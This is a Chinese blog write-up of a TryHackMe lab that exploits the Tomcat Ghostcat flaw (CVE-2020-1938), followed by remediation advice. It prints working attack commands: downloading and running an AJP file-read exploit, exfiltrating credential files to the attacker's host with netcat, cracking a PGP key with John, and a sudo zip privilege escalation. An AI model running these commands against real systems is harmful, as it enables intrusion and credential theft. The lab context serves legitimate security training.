以Apache Tomcat CVE-2020-1938任意文件读取漏洞(Tomghost)为例基于Tryhackme Tomghost Room的一次渗透测试

已于 2022-11-08 13:57:09 修改
阅读量1.1k 收藏 5
点赞数 1
分类专栏: 漏洞复现 Tryhackme 文章标签: tomcat apache 安全 网络安全
于 2022-11-08 13:52:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Shadow_DAI_990101/article/details/127749307
版权

以Apache Tomcat CVE-2020-1938任意文件读取漏洞(Tomghost)为例基于Tryhackme Tomghost Room的一次渗透测试

文章目录

1. 概述

1.1 Apache Tomcat

Tomcat服务器是一个免费的开放源代码的Web应用服务器,被普遍使用在轻量级Web应用服务的构架中。 Tomcat提供了可以在其中运行Java代码的“纯Java” HTTP Web服务器环境。

1.2 漏洞简述

CVE-2020-1938是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。

1.3 风险等级

评定方式等级
CVSS Score7.5
Confidentiality ImpactPartial
Integrity ImpactPartial
Availability ImpactPartial
实现难度
基础权限不需要
漏洞类型Execute Code

在这里插入图片描述

1.4 影响范围

在这里插入图片描述

1.5 漏洞详情

参见Apache Tomcat CVE-2020-1938,细思极恐&Apache Tomcat任意文件读取漏洞和命令执行漏洞源码分析

2. 环境配置

2.1 方案一: Tryhackme线上虚拟环境

在这里插入图片描述

2.2 方案二

3. 漏洞复现

3.1 Initial Recon

  1. 使用Nmap扫描,发现Apache运行在8080端口,8009端口运行ajp服务,
    nmap -sV -sC -T4 <ip>

    在这里插入图片描述

    首页就是Apache的默认页面,没啥有用的,其他页面也无法访问

    在这里插入图片描述

    在这里插入图片描述

  2. Google或Hackticks搜索AJP的相关内容

    1. Google后GitHub上发现可以越权读取web.xml文件的EXP
    2. Hackticks也提供了利用代码(需要修改,本文采用方法一)

    在这里插入图片描述

    在这里插入图片描述

3.2 Gaining Access

  1. 下载方法一提供的EXP

    wget https://raw.githubusercontent.com/00theway/Ghostcat-CNVD-2020-10487/master/ajpShooter.py

    在这里插入图片描述

  2. 运行EXP,获得了一个用户名和密码

    python3 ajpShooter.py http://10.10.76.159 8009 /WEB-INF/web.xml read

    在这里插入图片描述

  3. 使用上文获得的用户名和密码进行ssh登录,并发现有两个貌似可以利用的文件:.pgp和.asc!

    在这里插入图片描述
    在这里插入图片描述

  4. 为了更好的读取两个文件使用nc将他们传到kali上,然后进行base64解码

    base64 credential.pgp | nc 10.9.17.195 1234

    base64 tryhackme.asc | nc 10.9.17.195 1234

    nc -nvlp 1234 > credential.pgp.b64

    nc -nvlp 1234 > tryhackme.asc.b64

    在这里插入图片描述

  5. 猜测这个在asc文件中的PGP key是用来打开pgp文件的,那么先来尝试破解这个asc文件,将其转换为hash,然后使用John破解

    base64 -d credential.pgp.b64 > credential.pgp

    base64 -d tryhackme.asc.b64 > tryhackme.asc

    gpg2john tryhackme.asc > tryhackme.asc.john

    john --wordlist=/usr/share/wordlists/rockyou.txt tryhackme.asc.john

    在这里插入图片描述

  6. 得到密码后,将破解的key导入到asc文件,然后输入得到的密码,最后得到解密后的pgp文件,发现另外一个用户名

    gpg --import tryhackme.asc

    gpg --decrypt credential.pgp

    在这里插入图片描述

3.3 Privilege Escalation

  1. 使用新获得的用户名和密码ssh登录,使用sudo命令查看当前权限,发现当前用户能够以root权限运行zip并且不需要密码

    在这里插入图片描述

  2. 使用GTFObins提供的方法进行提权

    在这里插入图片描述

    在这里插入图片描述

4. 修复建议

  1. 临时禁用AJP协议端口,在conf/server.xml配置文件中注释掉<Connector port=“8009” protocol="AJP/1.3"redirectPort=“8443” />
  2. 将tomcat升级到9.0.31、8.5.51或者7.0.100版本
  3. 配置secret来设置AJP协议的认证凭证

5. 总结

Apache Tomcat CVE-2020-1938这个漏洞确实凶猛,攻击者可以读取到webapp目录下的任意文件,包括war包。而war包里有properties文件,不少开发团队都把连接数据库的用户名密码、JWT 签名secret、加解密密钥等重要信息放在这个文件里。这个漏洞的存在,允许攻击者可以最终读取到这些密钥数据,当然源码也是能通过反编译war包里的class文件得到的。

为了避免密钥泄露,常规做法(不要硬编码密钥到源代码、密钥单独放置在properties文件并且和源代码分别存储在不同的代码仓库)并不奏效,更为妥善的办法是使用密钥管理服务,你可以直接使用云服务提供商的密钥管理服务,也可以自己搭建一个。

安全原则是很重要的,尤其是最小权限和纵深防御原则。在这个漏洞案例中,就算你使用的Tomcat有问题,但由于相关端口已经关闭,而且还有好几层的网络映射和路由配置的防御,所以也不会受到影响。当然,第三方组件安全管理、安全补丁管理、实施端口监控等手段也有助于减轻或避免这个漏洞带来的影响。

6. References

CVE Details (2020) CVE-2020-1938. Available at: https://www.cvedetails.com/cve/CVE-2020-1938/…(Accessed: 22 Oct 2022).

ImShadowven
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【愚公系列】2023年05月 Web渗透测试Tomcat AJP协议攻击
时光隧道
08-25 5万+
Tomcat AJP协议攻击是一种利用Tomcat应用服务器中的AJP(Apache JServ 协议)协议漏洞或存在弱口令等安全问题的攻击方式。攻击者通过AJP协议访问Tomcat应用服务器的服务端口,从而获得未授权的对应用程序的访问权限。攻击者可以利用该漏洞实施远程代码执行攻击、敏感信息泄露等多种攻击手段。为有效遏制此类攻击,应当及时修复漏洞,并加强对应用程序的访问控制。
4W字+上千行代码!Tomcat渗透测试方法大总结,拿来吧你!
MachineGunJoe666
07-31 4098
目录 前言 安装 Tomcat分析 主要文件 上传目录 Tomcat渗透 Tomcat任意文件写入(CVE-2017-12615) Tomcat远程代码执行(CVE-2019-0232) Tomcat弱口令&后台getshell漏洞 Tomcat manager App暴力破解 Tomcat AJP文件包含漏洞分析(CVE-2020-1938) 前言 Tomcat服务器是一个免费的开放源代码的web应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下
CVE-2020-1938漏洞复现
Ch_an_ger的博客
06-18 1772
一、漏洞描述 Apache Tomcat服务器存在文件包含漏洞,攻击者可利用该漏洞读取或包含Tomcat 上所有webapp 目录下的任意文件,如:webapp 配置文件或源代码等。 二、Tomcat任意文件读取漏洞 Tomcat默认开启AJP服务,运行在8009端口,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web上的任意文件tomcat在接收ajp请求的时候调用org.apache.coyote.ajp.AjpProcessor来处理ajp消息,prepareRe
干货|最全的Tomcat漏洞复现
关注微信公众号【开源Linux】,后台回复『10T』,领取10T学习资源大放送,涵盖Linux、虚拟化、容器、云计算、网络、Python、Go等书籍和视频
09-06 1580
简介TomcatApache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开...
CVE-2020-1938复现
weixin_45931722的博客
01-28 7161
首先配置好Tomcat我在这里用的版本是8.0.49,JDK是1.8版本 查看到这边8009端口已经打开是AJP协议端口 我们在ROOT/WEB-INF目录下创建Test.txt 使用github的poc:cve-2020-1938_exp.py可以读取ROOT下的任意文件目录 (!!注意该脚本请使用Python2,我用的Python3.9会报错…!!!!) 读到了Test.txt中的hello world ...
CVE-2020-1938 Apache Tomcat 文件包含EXP
03-29
# CVE-2020-1938 Apache Tomcat 文件包含 影响版本: Tomcat6-9 Exp: ``` python CNVD-2020-10487-Tomcat-Ajp-lfi.py x.x.x.x -p 8009 -f urfile 一. 漏洞概述 2月20日,国家信息安全漏洞共享平台(CNVD)...
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938
03-05
压缩包中含有详细的文档说明、操作指南以及所需要的附件。本作者亲自验证有效。如果有问题,请联系作者QQ。
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
Tomcat服务器渗透后门源码
06-27
一次被攻击过后拿到的Tomcat服务器渗透后门源码
Tomcat任意文件读取 文件包含漏洞复现(CVE-2020-1938/CNVD-2020-10487)
jiji_king的博客
07-09 2307
个人笔记
kali-渗透攻击tomcat服务
齐泽文的Blog
04-16 6604
本文实验攻击目标为Metasploitable2-Linux1、打开msfconsole控制台root@qzwhost:~# msfconsole [-] Failed to connect to the database: could not connect to server: Connection refused Is the server running on host "localho...
Web漏洞-任意文件读取漏洞
Ays.Ie的博客
03-13 2394
该篇记录了Web漏洞-任意文件读取漏洞
Tomcat文件包含漏洞CVE-2020-1938
qq_58000413的博客
09-16 2551
Java 是目前 Web 开发中最主流的编程语言,而 Tomcat 是当前最流行的 Java 中间件服务器之一,从初版发布到现在已经有二十多年历史,在世界范围内广泛使用。由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件漏洞造成的原因是由于ajp设计缺陷,我们可以通过修改Tomcat ajp协议的端口,也可直接考虑关闭ajp connectoy,来避免攻击者攻击。用的是python2。
Apache Tomcat远程代码执行漏洞(CVE-2019-0232)
TivonaLH的博客
09-04 4481
受影响的版本 Apache Tomcat 9.0.0.M1 to 9.0.17 Apache Tomcat 8.5.0 to 8.5.39 Apache Tomcat 7.0.0 to 7.0.93 不受影响的版本 Apache Tomcat 9.0.18 Apache Tomcat 8.5.40 Apache Tomcat 7.0.94 解决方案: 关闭enableCmdLineA...
CTF靶机 Tomghost 笔记
z4yn:)的博客
06-23 476
Tomghost 靶机介绍 : 识别最近的漏洞,试图利用系统或读取您不应该访问的文件 靶机标签 : Tomcat, sudo zip提权, pgp, CVE-2020-1938 目标机ip:10.10.218.159 攻击机:kali Nmap 扫描目标机端口 开放了22,53,8009,8080端口 nmap -sV 10.10.218.159 访问8080端口,Apache Tomcat/9.0.30 在exploit-db上搜索对应CVE 下载EXP利用 下载后记得赋予执行权限 python
Apache Tomcat 任意文件读取漏洞复现与分析
糖小喵
06-04 2844
漏洞原因: 由于Tomcat对ajp传递过来的数据的处理存在问题,导致我们可以控制“javax.servlet.include.request_uri”,“javax.servlet.include.path_info”,“javax.servlet.include.servlet_path”,这三个参数,从而读取任意文件漏洞环境: Tomcat 8.0.50版本搭建, http://archive.apache.org/dist/tomcat/tomcat-8/v8.0.50/ 下载对应的T
Apache Tomcat文件包含漏洞(CVE-2020-1938)
最新发布
09-11
对于Apache Tomcat文件包含漏洞(CVE-2020-1938),该漏洞是在2020年2月份公开的,影响Tomcat 9.0.0.M1至9.0.30以及8.5.0至8.5.50版本。该漏洞允许攻击者通过发送特制的请求来执行任意文件读取和包含。 该漏洞的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值